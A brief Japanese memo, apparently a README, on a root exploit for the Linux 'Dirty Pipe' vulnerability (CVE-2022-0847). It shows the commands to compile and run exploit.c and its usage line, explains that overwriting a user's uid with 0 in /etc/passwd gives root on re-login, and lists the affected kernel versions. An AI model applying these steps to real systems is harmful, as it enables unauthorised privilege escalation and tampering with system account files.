
CVE-2022-0847(Dirty Pipe)のルートエクスプロイト
gcc exploit.c -o exploit -std=c99
#
./exploit
Usage: ./exp TARGETFILE OFFSET DATA
# /etc/passwd ファイル内の通常ユーザーの uid オフセット位置を見つけ、uid を 0 に変更するだけで、再ログインすると root 権限になります
影響範囲
Linux Kernel バージョン >= 5.8
Linux Kernel バージョン < 5.16.11 / 5.15.25 / 5.10.102